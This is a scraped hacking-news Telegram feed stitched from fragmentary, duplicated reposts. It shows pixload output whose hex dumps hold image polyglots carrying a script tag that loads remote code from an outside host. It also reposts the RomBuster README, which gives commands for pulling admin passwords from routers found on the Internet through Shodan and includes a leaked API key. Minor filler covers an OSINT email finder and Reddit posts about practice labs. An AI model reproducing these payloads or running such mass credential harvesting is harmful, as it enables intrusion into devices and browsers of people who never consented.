Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
oad.gif [>] Injecting payload into payload.gif [] Payload was injected successfully payload.gif: GIF image data, version 87a, 10799 x 32 00000000 47 49 46 38 37 61 2f 2a 20 00 80 00 00 04 02 04 |GIF87a/* .......| 00000010 00 00 00 2c 00 00 00 00 20…
hub.com/chinarulezzz/pixload


[>] Generating output file
[] File saved to: payload.png

[>] Injecting payload into payload.png

[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND

[>] Inject payload to the new chunk: 'pUnk'
[] Payload was injected successfully

payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced

00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR|
00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |... ... ........|
00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |.....pHYs.......|
00000030 c4 01 95 2b 0e 1b 00 00 00 19 49 44 41 54 48 89 |...+......IDATH.|
00000040 ed c1 31 01 00 00 00 c2 a0 f5 4f ed 61 0d a0 00 |..1.......O.a...|
00000050 00 00 6e 0c 20 00 01 c8 a2 88 fe 00 00 00 00 49 |..n. ..........I|
00000060 45 4e 44 ae 42 60 82 00 00 00 00 00 00 00 00 00 |END.B`..........| 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000000c0 00 1f 70 55 6e 6b 3c 73 63 72 69 70 74 20 73 72 |..pUnkscript sr| 000000d0 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 |c=//nji.xyz>| 000000e0 72 69 70 74 3e 9d 11 54 97 00 49 45 4e 44 |ript>..T..IEND| 000000ee
webp.pl

WebP Payload Creator/Injector.

Create a WebP Polyglot Image with custom/default payload, or inject payload into existing image.
Usage
./webp.pl [-payload 'STRING'] -output payload.webp

Currently, there is no possibility to inject the payload into an existing
webp image. Only the new (minimal) webp image will be created and your
payload will be injected into.

If the -output argument file exists, the payload will be injected into
the existing image, but this image will be corrupted.
Example
[>| WebP Payload Creator/Injector |]

https://github.com/chinarulezzz/pixload


[>] Generating output file
[] File saved to: payload.webp

[>] Injecting payload into payload.webp
[] Payload was injected successfully

payload.webp: RIFF (little-endian) data, Web/P image

00000000 52 49 46 46 2f 2a 00 00 57 45 42 50 56 50 38 4c |RIFF/*..WEBPVP8L|
00000010 ff ff ff 00 2f 00 00 00 10 07 10 11 11 88 88 fe |..../...........|
00000020 07 00 2a 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 |..*/=1;script s|
00000030 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 |rc=//nji.xyz>|
00000040 63 72 69 70 74 3e 3b |cript>;|
00000047
LICENSE

WTFPL
LEGAL DISCLAIMER

The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. Recent Tools* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Vqwdgis-90x90.png Offensive Security Tool: SecretFinder1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/3v1wot9-90x90.png Offensive Security Tool: CloudFail2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Screenshot_2021-06-04_053854-90x90.png Offensive Security Tool: Pacu – The Amazon Web Services Exploitation Framework3 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Screenshot_20210527_200634-90x90.png OSINT Tool: LinkedIn Scraper4 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/sna-768x373-1-90x90.png Offensive Security Tool: Snallygaster1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/image_2021-05-14_115500-90x90.png Offensive Security Tool: Breacher1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/image_2021-05-07_124858-90x90.png Offensive Security Tool: EyeWitness2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/Selection_017-90x90.png Offensive Security Tool: SSHPry2.02 months ago
* https://[...]
Hacking Articles Tips Tricks Videos Tutorials
hub.com/chinarulezzz/pixload [>] Generating output file [] File saved to: payload.png [>] Injecting payload into payload.png [+] Chunk size: 13 [+] Chunk type: IHDR [+] CRC: fc18eda3 [+] Chunk size: 9 [+] Chunk type: pHYs [+] CRC: 952b0e1b [+] Chunk size:…
www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image1-90x90.png Offensive Security Tool: ADFSBrute2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/logo-90x90.png Offensive Security Tool: Hunt2 months ago
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6620833063853657"
data-ad-slot="4517761481">
The post Offensive Security Tool: Pixload first appeared on Black Hat Ethical Hacking.
RomBuster - A Router Exploitation Tool That Allows To Disclosure Network Router Admin Password
http://www.kitploit.com/2021/06/rombuster-router-exploitation-tool-that.html
RomBuster is a router exploitation (https://www.kitploit.com/search/label/Router%20Exploitation) tool that allows to disclosure network router admin password.
Features
Exploits vulnerabilities (https://www.kitploit.com/search/label/vulnerabilities) in most popular routers such as D-Link, Zyxel, TP-Link and Huawei. Optimized to exploit multiple routers at one time from list with threading enabled. Simple CLI and API usage.
Installation
pip3 install git+https://github.com/EntySec/RomBuster
Basic usage
To use RomBuster just type rombuster in your terminal. exploitation tool that allows to disclosure network router admin password. optional arguments: -h, --help show this help message and exit -t, --threads Use threads for fastest work. -o OUTPUT, --output OUTPUT Output result to file. -i INPUT, --input INPUT Input file of addresses. -a ADDRESS, --address ADDRESS Single address. --shodan SHODAN Shodan API (https://www.kitploit.com/search/label/Shodan%20API) key for exploiting (https://www.kitploit.com/search/label/Exploiting) devices over Internet. --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. -p PAGES, --pages PAGES Number of pages you want to get from ZoomEye. ">usage: rombuster [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]

RomBuster is a router exploitation tool that allows to disclosure network
router admin password.

optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.

Examples
Exploiting single router Let's hack my router just for fun. rombuster -a 192.168.99.1 Exploiting routers from Internet Let's try to use Shodan search engine to exploit routers over Internet, we will use it with -t for fast exploitation. rombuster -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :) Exploiting routers from input file Let's try to use opened database of routers with -t for fast exploitation. rombuster -t -i routers.txt -o passwords.txt NOTE: It will exploit all routers in routers.txt list by their addresses and save all obtained passwords to passwords.txt.
API usage
RomBuster also has their own Python API that can be invoked by importing RomBuster to your code. from rombuster import RomBuster
Basic functions
There are all RomBuster basic functions that can be used to exploit specified router. exploit(address) - Exploit single router by given address.
Examples
Exploiting single router from rombuster import RomBuster

rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.100')

print(creds)

Download RomBuster (https://github.com/EntySec/RomBuster)
Bug Bounty Program: Oddz Incentivised Testnet

Earn Up To $10,000 As RewardsContinue reading on oddz finance »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
7 Unconventional Pieces of Password Wisdom

Challenging common beliefs about best practices in password hygiene.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
EmailFinder : Search Emails From A Domain Through Search Engines

EmailFinder is a tool to search emails through Search Engines. The software is designed to check a company’s emails found in the search engines |_ Author: @JosueEncinar|_ Description: Search emails from a domain through search engines.|_ Version: 0.1b|_ Usage: emailfinder -d domain.com Installation > pip3 install emailfinder Upgrades are also available using > pip3 install emailfinder –upgrade Search […]

The post EmailFinder : Search Emails From A Domain Through Search Engines appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
RomBuster - A Router Exploitation Tool That Allows To Disclosure Network Router Admin Password

https://1.bp.blogspot.com/--diL6TQbwUM/YND0_VNPE3I/AAAAAAAAc4Y/dRkFOFJub3kZalWmR47qhz3illsqPYEUQCNcBGAsYHQ/w640-h434/router_pass.jpg RomBuster is a router exploitation tool that allows to disclosure network router admin password. Features* Exploits vulnerabilities in most popular routers such as D-Link, Zyxel, TP-Linkand Huawei.
* Optimized to exploit multiple routers at one time from list with threading enabled.
* Simple CLI and API usage. Installationpip3 install git+https://github.com/EntySec/RomBusterBasic usageTo use RomBuster just type rombusterin your terminal.

exploitation tool that allows to disclosure network router admin password. optional arguments: -h, --help show this help message and exit -t, --threads Use threads for fastest work. -o OUTPUT, --output OUTPUT Output result to file. -i INPUT, --input INPUT Input file of addresses. -a ADDRESS, --address ADDRESS Single address. --shodan SHODAN Shodan API key for exploiting devices over Internet. --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. -p PAGES, --pages PAGES Number of pages you want to get from ZoomEye. ">usage: rombuster [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]

RomBuster is a router exploitation tool that allows to disclosure network
router admin password.

optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
ExamplesExploiting single router

Let's hack my router just for fun. rombuster -a 192.168.99.1Exploiting routers from Internet

Let's try to use Shodan search engine to exploit routers over Internet, we will use it with -tfor fast exploitation. rombuster -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgDNOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)

Exploiting routers from input file

Let's try to use opened database of routers with -tfor fast exploitation. rombuster -t -i routers.txt -o passwords.txtNOTE: It will exploit all routers in routers.txtlist by their addresses and save all obtained passwords to passwords.txt. API usageRomBuster also has their own Python API that can be invoked by importing RomBuster to your code. from rombuster import RomBusterBasic functionsThere are all RomBuster basic functions that can be used to exploit specified router.

* exploit(address)- Exploit single router by given address. ExamplesExploiting single router from rombuster import RomBuster

rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.100')

print(creds)
Download RomBuster
HackTheBox or TryHackMe ?
https://www.reddit.com/r/Pentesting/comments/o7pq31/hackthebox_or_tryhackme/

<!-- SC_OFF -->I am curious about your opinions of these two, since I've heard some negativity about THM's support and ethics. That said, my goal is to break into the cyber security industry. I'm already studying for OSCP as I've used Kali for years, but I do lack lab environments / training. BTW, I have 25 years of IT experience. I was a Unix admin in the 90s, and spent 20+ years with Linux, and Cisco networking. My goal is to use that foundational knowledge, learn what's required for OSCP, and have a sandbox / lab I can use. Would HTB or THM be suitable? Would you choose one over the other? <!-- SC_ON --> submitted by /u/DuskThaw (https://www.reddit.com/user/DuskThaw)
[link] (https://www.reddit.com/r/Pentesting/comments/o7pq31/hackthebox_or_tryhackme/) [comments] (https://www.reddit.com/r/Pentesting/comments/o7pq31/hackthebox_or_tryhackme/)
hacking: security in practice
Your definition of hacking?

I would like to hear everybody's definition of hacking because I feel like the word is used very loosely and I want to know what this community considers it to be.

submitted by /u/Mouthybard25364
[link] [comments]